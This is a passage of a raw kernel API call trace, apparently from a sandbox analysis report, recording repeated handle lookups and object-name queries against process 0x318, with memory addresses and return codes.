Object=0xffffd000b1b8e378*=0xffffe000698907d0, HandleInformation=0x0) returned 0x0 [0264.898] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.898] PsReleaseProcessExitSynchronization () returned 0x2 [0264.898] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8020b [0264.899] ObQueryNameString (in: Object=0xffffe000698907d0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.899] ObfDereferenceObject (Object=0xffffe000698907d0) returned 0x7fe4 [0264.899] IoCompleteRequest () returned 0x0 [0264.899] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.899] PsAcquireProcessExitSynchronization () returned 0x0 [0264.899] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.899] ObReferenceObjectByHandle (in: Handle=0x81c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a71a50, HandleInformation=0x0) returned 0x0 [0264.899] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.899] PsReleaseProcessExitSynchronization () returned 0x2 [0264.899] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8020a [0264.899] ObQueryNameString (in: Object=0xffffe00069a71a50, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.899] ObfDereferenceObject (Object=0xffffe00069a71a50) returned 0x7fd7 [0264.899] IoCompleteRequest () returned 0x0 [0264.899] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.899] PsAcquireProcessExitSynchronization () returned 0x0 [0264.899] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.899] ObReferenceObjectByHandle (in: Handle=0x838, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a76f20, HandleInformation=0x0) returned 0x0 [0264.899] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.899] PsReleaseProcessExitSynchronization () returned 0x2 [0264.899] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80209 [0264.899] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.899] ObfDereferenceObject (Object=0xffffe00069a76f20) returned 0x8000 [0264.899] IoCompleteRequest () returned 0x0 [0264.899] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.899] PsAcquireProcessExitSynchronization () returned 0x0 [0264.899] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.899] ObReferenceObjectByHandle (in: Handle=0x840, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a76c40, HandleInformation=0x0) returned 0x0 [0264.899] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.899] PsReleaseProcessExitSynchronization () returned 0x2 [0264.899] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80208 [0264.899] ObQueryNameString (in: Object=0xffffe00069a76c40, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.899] ObfDereferenceObject (Object=0xffffe00069a76c40) returned 0x7ff1 [0264.899] IoCompleteRequest () returned 0x0 [0264.899] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.899] PsAcquireProcessExitSynchronization () returned 0x0 [0264.899] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.899] ObReferenceObjectByHandle (in: Handle=0x844, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069dfc6d0, HandleInformation=0x0) returned 0x0 [0264.899] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.899] PsReleaseProcessExitSynchronization () returned 0x2 [0264.899] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80207 [0264.899] ObQueryNameString (in: Object=0xffffe00069dfc6d0, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.899] ObfDereferenceObject (Object=0xffffe00069dfc6d0) returned 0x7fff [0264.900] IoCompleteRequest () returned 0x0 [0264.900] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.900] PsAcquireProcessExitSynchronization () returned 0x0 [0264.900] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.900] ObReferenceObjectByHandle (in: Handle=0x860, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a91b70, HandleInformation=0x0) returned 0x0 [0264.900] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.900] PsReleaseProcessExitSynchronization () returned 0x2 [0264.900] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80206 [0264.900] ObQueryNameString (in: Object=0xffffe00069a91b70, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.900] ObfDereferenceObject (Object=0xffffe00069a91b70) returned 0x7528 [0264.900] IoCompleteRequest () returned 0x0 [0264.900] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.900] PsAcquireProcessExitSynchronization () returned 0x0 [0264.900] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.900] ObReferenceObjectByHandle (in: Handle=0xa20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000792d5290, HandleInformation=0x0) returned 0x0 [0264.900] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.900] PsReleaseProcessExitSynchronization () returned 0x2 [0264.900] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80205 [0264.900] ObQueryNameString (in: Object=0xffffe000792d5290, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.900] ObfDereferenceObject (Object=0xffffe000792d5290) returned 0x7fd8 [0264.900] IoCompleteRequest () returned 0x0 [0264.900] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.900] PsAcquireProcessExitSynchronization () returned 0x0 [0264.900] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.900] ObReferenceObjectByHandle (in: Handle=0xa68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148b1aca0, HandleInformation=0x0) returned 0x0 [0264.900] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.900] PsReleaseProcessExitSynchronization () returned 0x2 [0264.900] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80204 [0264.900] ObQueryNameString (in: Object=0xffffc00148b1aca0, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.900] ObfDereferenceObject (Object=0xffffc00148b1aca0) returned 0x8000 [0264.900] IoCompleteRequest () returned 0x0 [0264.900] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.900] PsAcquireProcessExitSynchronization () returned 0x0 [0264.900] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.900] ObReferenceObjectByHandle (in: Handle=0xa84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069ab6f20, HandleInformation=0x0) returned 0x0 [0264.900] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.900] PsReleaseProcessExitSynchronization () returned 0x2 [0264.900] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80203 [0264.900] ObQueryNameString (in: Object=0xffffe00069ab6f20, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.900] ObfDereferenceObject (Object=0xffffe00069ab6f20) returned 0x7fff [0264.900] IoCompleteRequest () returned 0x0 [0264.901] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.901] PsAcquireProcessExitSynchronization () returned 0x0 [0264.901] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.901] ObReferenceObjectByHandle (in: Handle=0xd54, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f21f20, HandleInformation=0x0) returned 0x0 [0264.901] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.901] PsReleaseProcessExitSynchronization () returned 0x2 [0264.901] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80202 [0264.901] ObQueryNameString (in: Object=0xffffe00069f21f20, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.901] ObfDereferenceObject (Object=0xffffe00069f21f20) returned 0x7fd0 [0264.901] IoCompleteRequest () returned 0x0 [0264.901] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.901] PsAcquireProcessExitSynchronization () returned 0x0 [0264.901] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.901] ObReferenceObjectByHandle (in: Handle=0xd90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a01bf20, HandleInformation=0x0) returned 0x0 [0264.901] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.901] PsReleaseProcessExitSynchronization () returned 0x2 [0264.901] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80201 [0264.901] ObQueryNameString (in: Object=0xffffe0006a01bf20, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.901] ObfDereferenceObject (Object=0xffffe0006a01bf20) returned 0x800f [0264.901] IoCompleteRequest () returned 0x0 [0264.901] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.901] PsAcquireProcessExitSynchronization () returned 0x0 [0264.901] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.901] ObReferenceObjectByHandle (in: Handle=0xdd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069ba0390, HandleInformation=0x0) returned 0x0 [0264.901] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.901] PsReleaseProcessExitSynchronization () returned 0x2 [0264.901] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80200 [0264.901] ObQueryNameString (in: Object=0xffffe00069ba0390, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.901] ObfDereferenceObject (Object=0xffffe00069ba0390) returned 0x7ffe [0264.901] IoCompleteRequest () returned 0x0 [0264.901] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.901] PsAcquireProcessExitSynchronization () returned 0x0 [0264.901] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.901] ObReferenceObjectByHandle (in: Handle=0xe14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bba090, HandleInformation=0x0) returned 0x0 [0264.901] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.901] PsReleaseProcessExitSynchronization () returned 0x2 [0264.901] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ff [0264.901] ObQueryNameString (in: Object=0xffffe00069bba090, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.901] ObfDereferenceObject (Object=0xffffe00069bba090) returned 0x7fff [0264.901] IoCompleteRequest () returned 0x0 [0264.901] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.901] PsAcquireProcessExitSynchronization () returned 0x0 [0264.901] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.901] ObReferenceObjectByHandle (in: Handle=0xe38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148aaea80, HandleInformation=0x0) returned 0x0 [0264.902] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.902] PsReleaseProcessExitSynchronization () returned 0x2 [0264.902] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801fe [0264.902] ObQueryNameString (in: Object=0xffffc00148aaea80, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.902] ObfDereferenceObject (Object=0xffffc00148aaea80) returned 0x20000 [0264.902] IoCompleteRequest () returned 0x0 [0264.902] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.902] PsAcquireProcessExitSynchronization () returned 0x0 [0264.902] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.902] ObReferenceObjectByHandle (in: Handle=0xf48, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148b53080, HandleInformation=0x0) returned 0x0 [0264.902] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.902] PsReleaseProcessExitSynchronization () returned 0x2 [0264.902] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801fd [0264.902] ObQueryNameString (in: Object=0xffffc00148b53080, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.902] ObfDereferenceObject (Object=0xffffc00148b53080) returned 0x8000 [0264.902] IoCompleteRequest () returned 0x0 [0264.903] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.903] PsAcquireProcessExitSynchronization () returned 0x0 [0264.903] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.903] ObReferenceObjectByHandle (in: Handle=0xfc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069d919a0, HandleInformation=0x0) returned 0x0 [0264.903] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.903] PsReleaseProcessExitSynchronization () returned 0x2 [0264.903] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801fc [0264.903] ObQueryNameString (in: Object=0xffffe00069d919a0, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.903] ObfDereferenceObject (Object=0xffffe00069d919a0) returned 0x7fff [0264.903] IoCompleteRequest () returned 0x0 [0264.903] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.903] PsAcquireProcessExitSynchronization () returned 0x0 [0264.903] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.903] ObReferenceObjectByHandle (in: Handle=0x10b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069d9d210, HandleInformation=0x0) returned 0x0 [0264.903] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.903] PsReleaseProcessExitSynchronization () returned 0x2 [0264.903] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801fb [0264.903] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.903] ObfDereferenceObject (Object=0xffffe00069d9d210) returned 0x7ffe [0264.903] IoCompleteRequest () returned 0x0 [0264.903] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.903] PsAcquireProcessExitSynchronization () returned 0x0 [0264.903] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.903] ObReferenceObjectByHandle (in: Handle=0x1134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069e00ea0, HandleInformation=0x0) returned 0x0 [0264.903] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.903] PsReleaseProcessExitSynchronization () returned 0x2 [0264.903] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801fa [0264.903] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.903] ObfDereferenceObject (Object=0xffffe00069e00ea0) returned 0x800c [0264.903] IoCompleteRequest () returned 0x0 [0264.903] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.903] PsAcquireProcessExitSynchronization () returned 0x0 [0264.904] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.904] ObReferenceObjectByHandle (in: Handle=0x1138, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069df9240, HandleInformation=0x0) returned 0x0 [0264.904] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.904] PsReleaseProcessExitSynchronization () returned 0x2 [0264.904] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801f9 [0264.904] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.904] ObfDereferenceObject (Object=0xffffe00069df9240) returned 0x7fdf [0264.904] IoCompleteRequest () returned 0x0 [0264.904] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.904] PsAcquireProcessExitSynchronization () returned 0x0 [0264.904] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.904] ObReferenceObjectByHandle (in: Handle=0x113c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069df9c40, HandleInformation=0x0) returned 0x0 [0264.904] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.904] PsReleaseProcessExitSynchronization () returned 0x2 [0264.904] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801f8 [0264.904] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.904] ObfDereferenceObject (Object=0xffffe00069df9c40) returned 0x800c [0264.904] IoCompleteRequest () returned 0x0 [0264.904] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.904] PsAcquireProcessExitSynchronization () returned 0x0 [0264.904] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.904] ObReferenceObjectByHandle (in: Handle=0x1140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069e00d30, HandleInformation=0x0) returned 0x0 [0264.904] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.904] PsReleaseProcessExitSynchronization () returned 0x2 [0264.904] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801f7 [0264.904] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.904] ObfDereferenceObject (Object=0xffffe00069e00d30) returned 0x7ec9 [0264.904] IoCompleteRequest () returned 0x0 [0264.904] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.904] PsAcquireProcessExitSynchronization () returned 0x0 [0264.904] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.904] ObReferenceObjectByHandle (in: Handle=0x1144, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069df9f20, HandleInformation=0x0) returned 0x0 [0264.904] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.904] PsReleaseProcessExitSynchronization () returned 0x2 [0264.904] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801f6 [0264.904] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.904] ObfDereferenceObject (Object=0xffffe00069df9f20) returned 0x7eff [0264.904] IoCompleteRequest () returned 0x0 [0264.904] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.904] PsAcquireProcessExitSynchronization () returned 0x0 [0264.904] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.904] ObReferenceObjectByHandle (in: Handle=0x1234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f05d90, HandleInformation=0x0) returned 0x0 [0264.904] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.905] PsReleaseProcessExitSynchronization () returned 0x2 [0264.905] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801f5 [0264.905] ObQueryNameString (in: Object=0xffffe00069f05d90, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.905] ObfDereferenceObject (Object=0xffffe00069f05d90) returned 0x7fff [0264.905] IoCompleteRequest () returned 0x0 [0264.905] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.905] PsAcquireProcessExitSynchronization () returned 0x0 [0264.905] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.905] ObReferenceObjectByHandle (in: Handle=0x12a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001493c2e50, HandleInformation=0x0) returned 0x0 [0264.905] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.905] PsReleaseProcessExitSynchronization () returned 0x2 [0264.905] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801f4 [0264.905] ObQueryNameString (in: Object=0xffffc001493c2e50, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.905] 